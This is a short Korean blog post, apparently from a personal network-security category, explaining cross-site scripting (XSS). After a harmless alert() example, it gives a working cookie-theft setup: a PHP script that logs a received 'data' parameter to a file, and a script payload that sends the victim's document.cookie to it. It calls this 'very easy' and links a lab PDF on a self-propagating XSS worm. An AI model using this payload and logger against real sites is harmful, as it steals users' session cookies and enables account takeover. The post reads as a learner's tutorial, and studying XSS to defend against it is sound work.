XSS(Cross Site Scripting)이란?
XSS이란 게시판같은 곳에 <script>태그를 삽입해서 개발자가 의도하지 않은 행위를 하는 것입니다.
<script>alert("뀨우뀨우")</script>
위와 같은 형태로 팝업 창을 띄워버리는 것입니다.
쿠키탈취
자, 그렇다면 다른 사람의 쿠키를 탈취하려면 어떻게 해야할까요?
cookie.php 라는 파일을 만들어서
<?php
$cookie=$_GET['data'];
$atime=date("y-m-d H:i:s");
$log=fopen("data.txt","a");
fwrite($log, $atime." ".$cookie."\r\n");
fclose($log);
echo "<img src=hackerDUN.png></img>";
?>
위와 같은 코드를 쓰고 난 뒤 , 스크립트로 실행시켜줍니다.
<script>window.open("cookie.php?data="+document.cookie)</script>
이렇게 하면 됩니다. 매우 쉽죠?
참조
https://duni0107-day.tistory.com/69
duni0107-day.tistory.com
self-propagating xss worm
self-propagating xss worm 이란게 있는데 얘는 아래의 링크 참조
http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Web/Web_XSS_Elgg/Web_XSS_Elgg.pdf
'개발 > 네트워크 보안' 카테고리의 다른 글
| Authentication (0) | 2019.12.10 |
|---|---|
| CSRF (0) | 2019.11.03 |
| 간단한 리눅스 명령어들 (0) | 2019.11.03 |
| SQL Injection 하는 법 (0) | 2019.10.06 |
| 간단한 리눅스 유저 권한 (0) | 2019.09.20 |